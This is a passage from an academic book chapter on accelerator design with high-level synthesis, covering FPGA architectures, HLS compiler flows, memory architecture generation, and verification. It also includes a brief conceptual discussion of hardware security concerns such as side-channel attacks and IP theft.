Fig. 2 Trading off performance and flexibility by using different target technologies. (Adapted
from Ndu 2012)
AI AI AI AI AI AI AI AI
Interconnecon Fabric
IO IO IO IO IO IO IO IO
Fig. 3 High-level FPGA organization: the device contains an array of configurable elements and
heterogeneous resources (e.g., DSP and Block RAMs). It may also feature dedicated engines that
are designed and optimized for AI processing
logic blocks and their configuration is called a bitstream. FPGAs have the flexibility
of processor-like architectures since they can be reused (after reconfiguration)
to execute different workloads, but they can achieve performance comparable to
ASICs, thanks to the possibility of implementing specialized microarchitectures on
the configurable blocks. Some FPGA devices also offer the possibility of changing
their functionality during the execution through partial dynamic reconfiguration.
Designers create all partial bitstreams statically (i.e., partial configurations only for
the specific FPGA region where the accelerators will be placed). The reconfigu-
ration loads the proper partial bitstream into the corresponding region through a
specific port, called an Internal Configuration Access Port (ICAP). This process
is time-consuming and used only when the benefits of hardware accelerators
are much greater than the reconfiguration time. A coarse-grain reconfigurable
846 C. Pilato and S. Soldavini
Accelerator Models
Designers have several alternatives for creating the microarchitecture of the special-
ized accelerators, especially due to different execution modes (Cota et al. 2015).
Configurable, extensible processors have specific accelerators integrated into the
pipeline of the given CPU to improve the execution of specific code portions.
The selected code to be accelerated is represented with a new instruction, and,
for this reason, the components are commonly referred to as custom instruction
set extensions (Brisk et al. 2004). After selecting the kernel instructions and
extending the compiler to target them (Galuzzi et al. 2006), HLS can create the
RTL microarchitecture of the accelerator to be integrated in the processor datap-
ath (Pothineni et al. 2010). Commercial products like Synopsys ARC and Cadence
Xtensa feature complete toolchains to profile the application, identify hot-spots
to be accelerated, and integrate the corresponding RTL modules. Accelerator-rich
architectures feature, instead, several stand-alone components that are designed to
provide peak performance for selected large kernels or even complete applications.
Large data sets are usually stored in an external memory (e.g., DRAM) that
is accessed with specific interfaces. Such accelerators can be configurable with
parameters that the user can specify (usually through input ports) to select a specific
functionality of the component. While components can be extremely complex,
many modern applications can be reduced to operations on large streams of
data. This is, for example, the case of machine-learning applications that need to
perform simple operations (e.g., convolutions) on many data. Control constructs
and synchronization can be introduced to reuse the same hardware resources to
iteratively operate on new data using the same concepts as software loops. To reduce
the complexity of large designs, designers can create dataflow architectures as a
collection of components communicating with latency-insensitive protocols (Car-
loni 2015). The specialization of the components can target the composition of
the block (Edwards et al. 2019), the memory architecture (Pilato et al. 2017), or
24 Accelerator Design with High-Level Synthesis 847
Accelerator Template
PLM
Controller
Controller Datapath
PLM
PLM
PLM
Datapath
Configuration registers
External allocation
Interface
from one component to the next (Giri et al. 2020). The processor core (CPU)
executes a software application to prepare the data in memory and configure the
accelerator through the interconnection system (e.g., a bus or a network-on-chip)
with memory-mapped operations on the configuration registers that are connected
to the input ports (Mantovani et al. 2020). The data stored in the external memory
(DRAM) are accessed through one or more memory controllers (Mantovani et al.
2016a). DMA mechanisms allow accelerators to exchange large data blocks with
DRAM (Cota et al. 2015; Pilato et al. 2017). When moved inside accelerators,
the data are stored in private local memories (PLMs) for fast access. PLMs can
also store data for the entire execution of the accelerator (Pilato et al. 2011b).
Accelerators access PLM data with known latency (e.g., one or two cycles), while
the latency of external accesses is usually unpredictable. While PLM accesses
make the scheduling of memory operations and the controller creation simpler,
accelerators must implement a latency-insensitive memory interfaces to guarantee
execution correctness when accessing external data. An FPGA can host the entire
system or only the accelerator part. In the latter case, the FPGA is combined
with a hard-core processor through an interconnection fabric or is a stand-alone
component, like in the IBM cloudFPGA project (Weerasinghe et al. 2016). IP and
technology vendors provide intellectual property (IP) blocks for common functions.
For example, Synopsys and Cadence offer soft IPs for high-speed communication
(e.g., SerDes IPs) like Ethernet physical layers. Similarly, FPGA vendors offer a list
of configurable IPs for common peripherals like DMA controllers to exchange data
with external memory banks, to access USB ports and PCIe bridges, and to display
data through video controllers.
The design of specialized hardware accelerators requires a design flow that allows
designers to generate the register-transfer level (RTL) microarchitecture associ-
ated with the desired functionality. High-level synthesis is a key technology in
this context. It automatically translates an input high-level specification into the
corresponding RTL implementation ready for logic synthesis (either for ASIC or
FPGA technologies). High-level synthesis is, indeed, a collection of methods and
algorithms to automatically define the RTL microarchitecture of a hardware module
starting from the specification of its functionality at a higher level of abstraction.
This process is similar to the generation of machine code for programmable
processors by compilers.
Figure 5 shows the overall organization of a classic HLS flow. The high-level code
represents the input functionality to implement. The designer can start from an
existing algorithm described in software-like languages (e.g., C, C++, or Python),
24 Accelerator Design with High-Level Synthesis 849
Hardware/software partitioning
Synthesizable code
Module/Data Allocation
Software code Mid-level HLS engine Scheduling
Binding
RTL Generation
Hardware IR
Back-end Code Generation
Finally, the back-end phase produces the artifacts for the subsequent design steps.
First, code generation produces the target RTL description in the desired hardware
description language (HDL) (RTL design). Similarly, testbench generation and
interface generation produce elements to support system-level integration and
verification of both the component and the system, respectively. This entire process
can be part of a larger design-space exploration framework to trade-off the different
design objectives within the final system.
The first HLS projects targeted ASIC with so-called silicon compilers (Gajski 1984;
Brewer and Gajski 1990), used especially for simple, data-intensive applications.
For example, Chippe (Brewer and Gajski 1990) included layout constraints during
behavioral synthesis. As the complexity of the hardware modules started increasing,
designers shifted toward high-level languages and compiler-based HLS frame-
works (Bazargan et al. 2000). Also, since FPGA devices allow for a fast turnaround
time to achieve a solution while ASIC requires extensive fine tuning of the designs,
HLS tools have been mostly developed for FPGA (Cong et al. 2011), with several
academic prototypes and commercial solutions (Nane et al. 2016) (see Chap. 28,
“FPGA-Specific Compilers” for more details on FPGA HLS tools).
Commercial tools are more oriented to a horizontal approach, simplifying
coding, porting, and analysis of the solutions. In most of the cases, such tools are
offered by FPGA vendors to simplify the use of their devices, in some cases free
of charge. For example, Xilinx Vivado HLS targets Xilinx FPGA devices, and
Intel HLS Compiler produces RTL code for Intel FPGA devices. Other tools,
like Siemens EDA Catapult HLS or Microsemi LegUp HLS Compiler, are
not vendor specific and can target a broader range of devices. Some HLS tools
also target ASIC, like Cadence Stratus, Siemens EDA Catapult HLS, and NEC
CyberWorkBench. All these tools have graphical user interfaces or TCL scripts
to automate the steps, with good estimators for performance and resource usage.
Indeed, they are often tightly connected to logic synthesis tools to provide accurate
resource characterizations, especially in case of ASIC. Most HLS tools also provide
synthesizable libraries of communication and synchronization protocols for building
more complex systems by focusing only on computational aspects (Guglielmo et al.
2014).
Academic projects, instead, are usually more focused on research and experimen-
tation with a vertical approach. For example, Spark (Gupta et al. 2003) was the first
public HLS framework, where the designer could set constraints on the resources
to show the relevance and impact of compiler transformations. GAUT (Coussy
et al. 2008) was a framework for DSP applications. GAUT introduced the concepts
of memory mapping, communication modules, and I/O timing to create pipelined
architectures. xPilot (Cong et al. 2006) was the first project to provide a complete
framework for the synthesis of application-specific configurable processors and
heterogeneous multicore architectures, focusing on FPGA targets. xPilot had been
24 Accelerator Design with High-Level Synthesis 851
later acquired by Xilinx to become the base of Vivado HLS, becoming one of the
most complete and easy-to-use HLS tools on the market. LegUp (Canis et al. 2013)
was an open-source HLS framework based on LLVM that allowed the creation
of complete SoC architectures for Altera (now Intel) FPGA devices. Thanks to
its modular organization, it has been widely used to prototype different types
of solutions for HLS problems, like bit-width analysis (Klimovic and Anderson
2013), profiling-driven optimization (Hadjis et al. 2015), and the effects of compiler
optimizations (Huang et al. 2015). It is now discontinued as it became a commercial
product, Microsemi LegUp HLS Compiler. Bambu (Pilato and Ferrandi 2013)
is one of the remaining open-source HLS frameworks. It allows designers to
experiment with HLS solutions, thanks to a modular and dynamic compilation
framework based on both GCC and LLVM (Lattuada and Ferrandi 2019). It
focuses on the problem of understanding how to synthesize C/C++ semantics. To
do so, it offers a unique memory microarchitecture that supports most of the C
constructs without semantic changes (including dynamic pointer resolution and
memory allocation (Pilato et al. 2011b)). It has been also used to integrate solutions
for hardware- and hardware-assisted security, like intrinsic dynamic information
flow tracking (Pilato et al. 2019), IP watermarking (Pilato et al. 2018b), and
algorithm-level obfuscation (Pilato et al. 2018c). There are also projects that focus
on specific accelerator models (like dataflow compilers) or application domains (like
deep learning), especially for FPGA targets. The interested reader can refer to the
Chap. 28, “FPGA-Specific Compilers” for more details.
This section discusses the transition from the input high-level specification into a
language-agnostic representation that is optimized for hardware generation. One of
the first major challenges in HLS is the right choice of input language and compiler
(with associated transformations) based on the characteristics and requirements of
the given application (e.g., the expected latency).
Most preexisting algorithms are described with traditional languages (like C, C++,
Fortran, etc.). Therefore, modern HLS tools are mostly built on top of state-of-the-
art software compilers, like LLVM and GCC (Buyukkurt et al. 2011; Huang et al.
2015). These compilers have support for many input languages and can support the
porting of legacy code into hardware. Also, they can leverage many years of research
in compiler construction to extract, analyze, and optimize a representation that is
more suitable to hardware implementation. To simplify compiler optimizations, the
IR is usually translated into a static single assignment (SSA) form where multiple
assignments to the same variable create different versions, as shown in Fig. 6.
Source-to-source compilers can rewrite existing code into a more hardware-friendly
852 C. Pilato and S. Soldavini
y = x + 1 y1 = x 2 + 1 y1 = x2 + 1
y = x * 2 y2 = x 2 * 2 w1 = y1
y2 = x2 << 1
w = y w1 = y 1
Fig. 6 Example of code (a), its corresponding static single assignment (SSA) form (b), and the
optimized IR after strength reduction and dead-code elimination (c)
format and expose more “knobs” for optimization (Cong et al. 2016). For example,
since commercial HLS tools use directives to optimize the input code, source-to-
source transformations can automatically insert identifiers (e.g., loop labels) and
transform the code to better apply synthesis directives.
Modern machine-learning applications make heavy uses of operations on multi-
dimensional arrays, also called “tensors.” These applications are often extremely
parallel and suitable for hardware acceleration. In such systems, the creation of
the memory architecture demands efficient methods to describe the operations and
the data access patterns. Many languages have been proposed as the front end to
HLS frameworks to better expose such details. Halide (Ragan-Kelley et al. 2013)
simplifies the descriptions of high-performance image and array processing code,
while Halide-HLS (Pu et al. 2017) is an extension to target FPGAs. Machine-
learning applications are built almost exclusively with Python-based frameworks
like PyTorch, TensorFlow, Caffe, etc. Python is a popular language that hides
many details from the programmers. Compilers translate Python representations into
code that can be processed by HLS tools based on traditional IRs.
Traditional compilers progressively transform the IR into simpler operations that
are later mapped on machine instructions. This process loses important information
for hardware generation, like information of the size of the data structures and
the patterns across operations that help define the memory system. Designers are
working to extend these representations to pass more information over the compiler
passes until it reaches the HLS flow. For example, Google recently proposed LLVM
Multi-Level Intermediate Representation (MLIR) (Lattner et al. 2020) to create
a customizable compilation framework that provides information at different levels.
Similarly, Heterogeneous Parallel Virtual Machine (HPVM) (Kotsifakou et al.
2018) is a representation for a parallel compiler that aims at simplifying the code
implementation of parallel hardware. These representations are often combined with
domain-specific languages where the designer can abstract specific hardware details.
For example, Spatial (Koeplinger et al. 2018) is a recent language to describe
hardware accelerators at a higher level. Such descriptions are later compiled and
24 Accelerator Design with High-Level Synthesis 853
translated into Chisel and then into Verilog. These frameworks can be considered
more as “hardware generators” rather than complete HLS tools. Indeed, they
operate more as “translators” from the input to the output descriptions, with limited
optimizations.
The next phase analyzes and transforms the IR extracted from the source code
to create a more hardware-friendly representation and optimize the component to
generate. Applying IR-level transformations simplifies the following HLS steps,
improving the accelerator’s performance or reducing its hardware cost. Some
transformations are borrowed from traditional compiler optimizations, while others
are specific for hardware. This is another motivation for which it is convenient to
base HLS on stable and mature compiler frameworks.
Constant propagation and strength reduction are classic compiler transfor-
mations that can simplify or even eliminate arithmetic operations in the code. For
example, the instruction “x_2 * 2” of Fig. 6 can be transformed into“x_2 « 1”
(see Fig. 6c): a left shifter is much more hardware efficient than a multiplier.
Designers may replace some variables with constants representing their average
values to leverage these optimizations. These transformations are usually referred
as software approximation techniques and allow designers to obtain efficient
hardware despite minor errors in the results. Dead-code elimination removes
unnecessary code, which will be otherwise translated into unnecessary hardware
(see, e.g., instruction “w_1 = y_1” in Fig. 6c). This applies, for example, when
control code depends on input parameters that, in specific accelerator instances,
are always set to constant values. HLS is often limited by control constructs, like
if-then-else statements. Operations in the true/false branches cannot
start their execution until the condition is evaluated. Code speculation moves
some operations before the condition evaluation so that they can be executed in
parallel (Lattuada and Ferrandi 2015). Results are temporarily stored in registers
and, after evaluating the condition, the values of the “wrong” operations are
discarded. This optimization increases the available parallelism, leading to better
performance.
Compiler analyses and transformations can also reduce data dependencies and
increase hardware parallelism. For example, pointers are widely used to create effi-
cient software code. However, their implementation in hardware is complex because
a pointer-based operation must be connected to all the memory locations (either
internal or external) where the corresponding information is potentially stored. Alias
analysis helps determine if two pointers in the source code can ever refer to the
same memory location. If it can be proven that two pointers never refer to the
same object, there is no dependency, enabling more memory optimizations. Static
pointer resolution determines the exact variable accessed by a pointer operation,
eliminating the need for an explicit pointer. This information can be later used
854 C. Pilato and S. Soldavini
to optimize the creation of the memory architecture (see Section “Creation of the
Microarchitecture”) because the two operations can potentially run in parallel when
proved to access different data (Pilato et al. 2011b). Additional memory analyses
determine the list of data structures to allocate in memory and their characteristics
(e.g., size and bit-width) for determining whether the corresponding memories fit
inside the area constraints of the accelerators. Other transformations operate on the
data structures to expose more parallelism. Indeed, arrays are generally stored in
memories with limited ports. Designers can apply array partitioning and scalar
replacement of aggregates to reduce the number of memory dependencies.
While software developers can overestimate the bit requirements for some data,
many applications do not use the full range of the corresponding variables. Since a
processor’s hardware is already built with pre-defined registers and arithmetic-logic
units, the execution with overestimated variables has almost no extra cost. Hardware
specialization requires, instead, to determine the minimal resources needed for the
computation to trim unnecessary logic. Therefore, the front-end phase also performs
bit-width analysis to determine the required precision of each operation to maintain
execution correctness and bit-width transformations to propagate the information
through the design with iterative methods. Similar transformations include also
numerical conversions (e.g., from floating-point to fixed-point representations)
to reduce hardware cost but maintain a certain level of accuracy of the results.
In this context, many HLS tools, for example, Xilinx Vivado HLS and Cadence
Stratus, allow library extensions to manually specify the precision of input/output
data or to specify particular bit-level operations on the signals. This feature is
particularly useful when HLS is used to generate components to be integrated in
larger specialized systems like industrial machines. Synthesizable C++ libraries,
like HLSLibs, have been proposed to extend existing HLS tools with custom
precision.
Especially in data-intensive applications, loops account for most of the acceler-
ator execution, and it is complex to extract parallelism from their representations.
Most of the parallelism is often between consecutive iterations. While spatial exe-
cution can create multiple parallel instances of the loop body, hardware synthesis is
usually limited by the loop boundaries. Therefore, loop transformations are widely
used to expose more hardware parallelism. For example, loop unrolling replicates
multiple instances of a loop body to execute in the same iteration. Therefore, the
number of operations between control branches is increased, potentially leading to
more parallelism. However, this transformation requires a careful analysis of the
dependencies; otherwise, the multiple iterations in the same loop body are serialized
without an effective speedup. Artificial dependencies can also be due to conflict on
resources, like in the case of limited memory ports, forcing the serialization of the
operations. Another important transformation is loop pipelining: consecutive loop
iterations are partially overlapped. This optimization follows the same principles of
instruction execution in pipelined processors, when an instruction can start before
the termination of the previous one. In this case, the initiation interval (II) is an
important parameter: it represents the number of cycles required by the loop to start
a new iteration. A perfect pipeline starts a new iteration after each cycle (I I = 1).
24 Accelerator Design with High-Level Synthesis 855
budget for each synchronous event), i.e., by estimating the slack of each clock
cycle (Chang et al. 1996). The slack is the margin between the delay of the circuit
and the given timing requirement. Negative slack means that the timing constraint is
violated, while a positive slack means that an extra delay could be tolerated. There
are multiple situations during scheduling:
• the operation terminates much earlier than the clock period (i.e., the slack is
positive and high); in this case, it might be possible to execute another operation
provided that it fits in the remaining time (operation chaining);
• the operation terminates right before the end of the clock period; the result will
be then used in a subsequent cycle and it must be stored in a register;
• the operation takes more than one cycle and its result shall be saved only when
finished (multi-cycling); in this case, if the functional unit is pipelined (i.e., it
contains internal register to create computational stages), another operation can
start on the same resource even before the current one is completed.
allocated outside the accelerators, the HLS engine must follow safe assumptions
to guarantee correct execution in all cases: the corresponding data could be
allocated off-chip or multiple accelerators can access the same memory creating
contention and additional latency. Therefore, the scheduling algorithm must assume
the external memory operations have unknown latency (Ranjan Panda et al. 1998).
The same case applies to operations corresponding to unpredictable components,
like data-dependent submodules. In case of operations with unknown latency, the
scheduling uses latency-insensitive protocols (Carloni 2015) to guarantee that the
computation proceeds only when the operation is completed. However, executing
multiple operations with variable latency in the same clock cycle is complex.
Therefore, these operations are generally serialized by most of the HLS engines.
This serialization may become inefficient when trying to optimize the latency
or guarantee the worst-case execution time. Designers proposed approaches for
dynamically scheduling the operations. While this concept is highly efficient, the
area overhead for implementing the control logic is high and the dynamic scheduling
is usually limited to specific cases, like memory-related operations (Pilato et al.
2011a; Josipović et al. 2018).
from different sources) and registers (since different variables could be produced by
distinct functional units). When a port receives signals from multiple sources, HLS
engines introduce multiplexers to determine the path active at any given time and
drive the signal values. The controller FSM generates control signals to activate the
proper paths from source to destination in each clock cycle (see Section “Creation
of the FSM Controller”). Resource binding has a huge impact on the number of
multiplexers to add. Several methods have been proposed to consider the impact
of interconnections during HLS. For example, register binding can be combined
with port swapping (Chen and Cong 2004). This optimization swaps the inputs of
commutative operations, aiming at reducing the number of paths to each port of the
units. This reduces, in turn, the number of multiplexers that are needed.
DRAM
860 C. Pilato and S. Soldavini
if (ping) if (ping)
A0[i i])
else else
A1[i i])
Fig. 8 Resource optimizations for memory IPs with Mnemosyne (Pilato et al. 2017)
in the same memory bank (but in different memory spaces), and there will not be
port contention. This memory bank sharing can greatly reduce the resource usage.
Mnemosyne is a tool designed to generate an optimized memory architecture based
on a set of characteristics of the data structures and the access patterns that can be
provided by the designers (Pilato et al. 2017). The tool analyzes such compatibilities
and applies automatic technology-aware transformations (supporting both FPGA
and ASIC technologies) to select the proper physical banks in the given technology
and determines how to share these physical banks when the data structures mapped
on them have disjoint lifetimes. Mnemosyne encapsulates the memory banks
in lightweight memory interfaces that translate the logical requests to the data
structures into physical requests to the generated bank configuration (see Fig. 8).
Irregular memory accesses are often data dependent or require dynamic reso-
lution of the pointers. These operations are complex when executed in hardware
because of the limited flexibility, and only few HLS tools support memory architec-
tures with dynamic pointer resolution. For example, Bambu builds a daisy-chain
architecture on top of alias-analysis results, as shown in Fig. 9. The memory
allocation step resolves the pointers, i.e., converts them into classic memory
operations, when the set of possible target data structures is limited to one. Such
operations are later directly connected to memory that stores the corresponding data
structure, potentially increasing the parallelism on memory operations. Operations
with pointers that cannot be “resolved” are connected in daisy-chain with the
potential memories. At design time, the HLS engine assigns a specific memory
address to every data structure and, in turn, the associated memory space both
on-chip and off-chip. At run time, when an address is propagated through the daisy-
chain, only one memory will be activated by the request. In particular, when the
address refers to data allocated off-chip, the request reaches the external memory
interface and is sent to the corresponding memory controller. The scheduling phase
can further distribute the memory accesses to hide the latency of memory transfers
especially when accessing the data off-chip.
862 C. Pilato and S. Soldavini
Heterogeneous SoC
DRAM Ctrl
Hardware Module
Memory Interface
Controller + Datapath
DRAM
System Interconnect
Hardware Module
Interface
Memory
local
memory
Conf. Regs
local local CPU
memory memory
Fig. 9 Daisy-chain memory architecture to support the dynamic resolution of memory addresses
in Bambu (Pilato et al. 2011b; Pilato and Ferrandi 2013)
coming from HLS. When performing operations on the PE array, the data are
moved from the main memory to the on-chip memories, and the array is configured
to execute the given dataflow. Ping-pong buffers are used to overlap computation
and communication. The same optimizations described above (multi-port memories
and distribution of the accesses to avoid conflicts) can be applied to optimize the
architecture. Designers must explore similar trade-offs between more banks for
higher throughput and fewer banks for better wiring and physical constraints.
After defining the complete microarchitecture of the accelerator, the HLS engine
must define the control part, i.e., the component that determines the control signals
for the datapath in each clock cycle. This part is modeled as a deterministic finite-
state machine (FSM). An FSM is a directed graph where each node represents
a control state and the edges are the transitions from one state to another. Each
control state contains the set of operations to be executed in the corresponding clock
cycle, along with the control signals for the datapath resources (e.g., multiplexer
selectors and register write-enable signals). For each operation to execute on a given
functional unit, the FSM determines the paths for providing the input values to the
functional unit and the results to the next resource (either another functional unit
in chaining or a target register). Based on the scheduling and the evaluation of the
conditions in the datapath, the control state determines which transition to activate,
i.e., which is the next control state to execute.
The controller FSM manages not only the execution inside the accelerator
but also the system-level synchronization with external components. This aspect
is relevant especially for control-dominated applications (where the accelerator’s
execution can vary based on external signals) and streaming architectures (where
data availability can change the accelerator dynamics). In these cases, the controller
must receive additional control signals from the rest of the system to determine
which specific transitions must be activated inside the FSM.
After the HLS engine defines the microarchitecture of the accelerator (both datapath
and controller), the last phase produces the HDL descriptions for the subsequent
logic synthesis and the auxiliary files for system-level integration.
FPGA synthesis tools may infer these components in different ways. Similarly,
targeting ASIC technologies requires to instantiate the vendor-specific descriptions
of the proper Static RAMs. For example, Mnemosyne provides an abstraction to
low-level details. The designer is only required to provide a wrapper around the
specific SRAMs to match the standardized signal descriptions.
In this phase, many tools (e.g., Xilinx Vivado HLS and Bambu) provide early
estimations on the hardware cost of the design. While complete synthesis can
provide more accurate results, this process is time-consuming and not feasible when
the designer needs to explore many alternatives before finding the most favorable
implementation. These estimations are based on different methods, including
cumulative costs of single resources, linear regressions, and graph neural networks
to include feedback from actual synthesis steps (Makrani et al. 2019).
Once the design has been finalized, the designers also need to verify that the
hardware execution produces the expected results. Indeed, errors can be caused by
incorrect language specifications, misuse of synthesis directives, wrong connection
of the components, or bugs in the HLS tools. While formal verification is a well-
established step in logic and physical synthesis, this approach requires reference and
current designs to be described in hardware languages. However, in case of HLS, the
input code is usually a software-level, untimed specification. Therefore, simulation-
based approaches remain the preferred solution for HLS verification (Chen et al.
2017). Heterogeneous architectures exacerbate these verification issues for the
application programmers, especially when the computation is distributed across
software and hardware tasks, and the accelerators are generated with different
methods (e.g., preexisting IPs, manually designed components, and HLS modules
created with different toolchains). Hardware/software debugging allows designers
to backtrack the origin of a bug to the exact point of failure. Since the complexity
of architectures is increasing, bugs could be exercised after a long execution
time. Therefore, in case of system-level verification, simulation-based approaches
have been progressively replaced by on-chip debugging. Many FPGA vendors, for
example, provide automated methods to trace internal signals, exposing them to
the user to identify execution anomalies. Advanced methods automatically identify
discrepancies between hardware execution and the expected behavior (precomputed
in software), restricting the area where the error originated (Fezzardi et al. 2015).
These approaches are particularly efficient in FPGA, thanks to the reconfiguration
of the logic. The designer can implement a design with on-chip monitors, execute it
directly on the target system to verify the behavior, and modify the functionality in
case of problems. For this reason, FPGA prototyping is largely used also in ASIC
design flows to emulate the functionality of the entire chip and test the interaction
with the software, including the operating system (OS) (Mantovani et al. 2016b).
This section discusses open challenges that still need to be addressed in HLS and
modern challenges in hardware design that can be efficiently addressed and tackled
with the support of HLS.
However, this process is complex as it requires several details that are currently
lost in the compilation process. Software programmers usually need little to no
thought to be put into memory management, where hardware optimizations (e.g.,
complex cache hierarchies, bypassing, etc.) hide the latency. In case of accelerators,
the specialization of the memory architectures adds effort to the development time,
both at the software and hardware levels (Dally et al. 2020). At the software
level, algorithms need to be reworked to reap the full benefits of a custom
memory architecture. Domain-specific languages, like Spatial, incorporate hardware
abstractions to ease the description of common memory operations and speed up
the development of these accelerators. For example, operations on arrays, tensors,
and matrices are common in scientific and machine-learning applications. Such
operations must be translated into efficient operations regardless of the allocation
of the data and the location/implementation of the memories. At the hardware level,
deciding how to partition a software data structure requires many considerations.
On one hand, larger memories are slower, use more power, and use more resources.
On the other hand, the external routing and address calculation logic for a collection
of many smaller memories have the same issues. A middle ground between one
large memory and many small memories exists which minimizes these issues, but
finding the right compromise can be difficult. Automated high-level synthesis can
be useful to perform rapid design space exploration to find a desired trade-off
point. Specialized modules for pre-fetching the data from external memories can
hide the communication latency but require global information on the use of the
data. In case of systolic array architectures, the designers have to carefully define
the local memories and the buffers between them and the processing elements to
also coordinate the data transfers with the off-chip memory. However, this process
requires more information than is available in current HLS flows.
Emerging technologies will play a key role in the design of efficient, secure,
and reliable accelerators. First, integrated voltage regulators will enable fine-grained
power management with dynamic voltage-frequency scaling, while dual-rail mem-
ories will help reduce the static power consumption. In addition, some applications,
like graph analytics, require frequent but irregular memory accesses to off-chip
memory, whose I/O circuitry and refresh activities are responsible for up to 30%
of the system energy consumption (power wall). The specialization of memory
architectures, in this case, must include emerging memory technologies. However,
many novel technologies, like Hybrid Memory Cube and High Bandwidth Memory
technologies, are 3D solutions that can store only few gigabytes of data, while
DDR4 can store up to hundreds of gigabytes (capacity wall). Architectures that
combine DRAM with nonvolatile memory technologies (NVM), which require no
refresh, can store up to terabytes of data but require a careful co-design that involves
the entire stack (Hameed et al. 2018).
Finally, all specializations require modifications to the HLS input languages
to embed more domain-specific information. Domain-specific languages (DSLs)
will be used by application engineers to specify the algorithmic core of the
computation. They will be increasingly used to provide rich information to the
compiler and lower-level tools about the high-level semantics of the algorithms.
24 Accelerator Design with High-Level Synthesis 867
While DSLs can help describe functional requirements (like the operations among
data structures), additional annotations allow designers to express nonfunctional
requirements or constraints. For example, Bambu already supports the specification
of custom data allocation via XML files to specialize the creation of the accelerator’s
memory architecture and the simplification of the logic to compute the addresses.
However, a co-design of the accelerators with the algorithm description would
allow the automatic configurations of these steps (see Section “Programmability
and System-Level Optimization”). However, DSLs are usually hard to be accepted
by software programmers and they may create integration issues. An interesting
approach is to use DSL only for specific application kernels embedded in traditional
languages, e.g., with template meta-programming in C++, or for high-level specifi-
cations of specific workloads (e.g., machine-learning algorithms) (see Chap. 28,
“FPGA-Specific Compilers” for more details).
Hardware/software integration has open challenges for data allocation in the case
of large data sets. Current solutions allow users to allocate data at the software
side and transparently access them from the accelerators; these solutions are
processor-centric. Data are allocated in the memory hierarchy of the processors
(see, e.g., the Intel HARP prototype system), or the accelerator requires efficient
methods not only to manage the data locally but also to hide the latency to
access them. The design of domain-specific accelerators requires the approach
to be changed and the components to be co-designed with the domain-specific
memory architecture and the corresponding allocation policy. To do so, designers
need a unified representation of the software code and the HLS specification to
apply holistic transformations at both sides. Modern compiler representations, like
MLIR (Lattner et al. 2021), are gaining attraction but require specific customization
within HLS frameworks. These representations will enable and ease the integration
of specific memory-specific transformations in the front-end phase. For example,
loop transformations will be coordinated with transformations in the data structures
to improve the data accesses based on the technology of the memories and the
location of the data. Rich information about the data access patterns of the algorithm
allows the compiler to extract more parallelism and embed more intelligence in the
memory controllers.
Finally, design space exploration will become more and more important to
offer alternative solutions to the designers. Indeed, a fully automated approach is
almost impossible to achieve also because the effects of compiler optimizations
and transformations are often application-dependent. Therefore, HLS tools have
limited view or control on the synthesis process and no well-established flows or
sequence of passes. Designers must apply transformations, analyze and understand
the results, and derive knowledge for further optimization. This process is the same
as in software compilers for code optimization, where machine-learning approaches
have been proposed for compiler autotuning (Ashouri et al. 2018).
868 C. Pilato and S. Soldavini
FPGA-based systems are typically used in applications and algorithms, like machine
learning, that are rapidly changing. The flexibility of FPGA systems is also used
by cloud service providers to reuse the resources across multiple users (tenants).
However, this opens up the possibility that malicious providers can copy the design’s
intellectual property or users can steal sensitive data of other applications (Pilato
et al. 2018a). While protection methods exist for specific cases, their manual
application becomes unfeasible for large systems due to their cost or for nonexpert
designers due to their complexity. Also, the heterogeneity of the system can
introduce new vulnerabilities due to the interaction of components that are not
designed at the same time. For example, accelerators have fixed functionality;
therefore, it is not possible to perform code injection. However, a malicious
attacker can launch software-based attacks by providing configuration parameters
or system configurations that exploit known vulnerabilities in single components or
their interactions.
Physical attacks can exploit the weaknesses of a given hardware implementation
for stealing private data (information leakage). For example, side-channel attacks
can extract secret data by analyzing nonfunctional effects (like power consumption
and timing characteristics) of the device execution. Accelerators can mitigate side-
channel attacks by scrambling the execution to make a uniform power consumption
or ensuring constant execution time to thwart timing attacks (Jiang et al. 2018). The
modular HLS flow can accommodate additional passes to automatically integrate
these extensions and co-optimize them with the accelerator logic.
Another critical issue is IP theft: designing heterogeneous systems is a complex
and expensive process. The outcome should be protected from reverse engineering
and unauthorized copying, which can create billions of dollars of economic damages
for the semiconductor design houses. While designers are more sensitive to this
problem for ASIC, it is finding an increasing interest also in the FPGA and HLS
community. First, designers must guarantee that outsourcing the execution of their
designs to third-party cloud providers does not leak details about their algorithms
or implementations. Then, embedded FPGAs are also used in several integrated
circuits to host specific functions to hide, where HLS identifies and implements
such functions to fit into the given logic (Chen et al. 2020). Such security features,
like watermarking and obfuscation, can be introduced on the top of the HLS
results (Pilato et al. 2018b,c). For example, TAO applies semantic obfuscation
during HLS to the design of an accelerator that is able to thwart reverse engineering.
Conclusion
synthesis is a key enabling technology for the creation of such systems. Nonexpert
designers can use HLS to create specialized accelerators directly from high-level
specifications, focusing only on the algorithmic development. HLS then creates
and optimizes the hardware components based on the user’s requirements hiding
most of the effort from the designers. This chapter provided an overview on the
HLS process, describing the existing approaches for the different HLS phases: the
analysis of the input specification, the creation of the accelerator microarchitecture,
and the generation of the output files. It also discussed open challenges, like
the creation of domain-specific architectures and the programmability issues, and
modern challenges, like security concerns, that can be addressed with the support of
HLS.
References
Ashouri AH, Killian W, Cavazos J, Palermo G, Silvano C (2018) A survey on compiler autotuning
using machine learning. ACM Comput Surv 51(5):1–42
Bazargan K, Kastner R, Ogrenci S, Sarrafzadeh M (2000) A c to hardware/software compiler.
In: Proceedings of the IEEE symposium on field-programmable custom computing machines
(FCCM), pp 331–332
Bombieri N, Liu H-Y, Fummi F, Carloni LP (2013) A method to abstract RTL IP blocks into
C++ code and enable high-level synthesis. In: Proceedings of the ACM/EDAC/IEEE design
automation conference (DAC), pp 1–9
Brewer F, Gajski DD (1990) Chippe: a system for constraint driven behavioral synthesis. IEEE
Trans Comput-Aided Des Integr Circuits Syst 9(7):681–695
Brisk P, Kaplan A, Sarrafzadeh M (2004) Area-efficient instruction set synthesis for reconfig-
urable system-on-chip designs. In: Proceedings of the ACM/EDAC/IEEE design automation
conference (DAC), pp 395–400
Brisk P, Dabiri F, Jafari R, Sarrafzadeh M (2006) Optimal register sharing for high-level synthesis
of SSA form programs. IEEE Trans Comput-Aided Des Integr Circuits Syst 25(5):772–779
Buyukkurt B, Cortes J, Villarreal J, Najjar WA (2011) Impact of high-level transformations within
the ROCCC framework. ACM Trans Archit Code Optim (TACO) 7(4):17
Canis A, Choi J, Aldham M, Zhang V, Kammoona A, Czajkowski T, Brown SD, Anderson JH
(2013) Legup: an open-source high-level synthesis tool for FPGA-based processor/accelerator
systems. ACM Trans Embed Comput Syst (TECS) 13(2):24:1–24:27
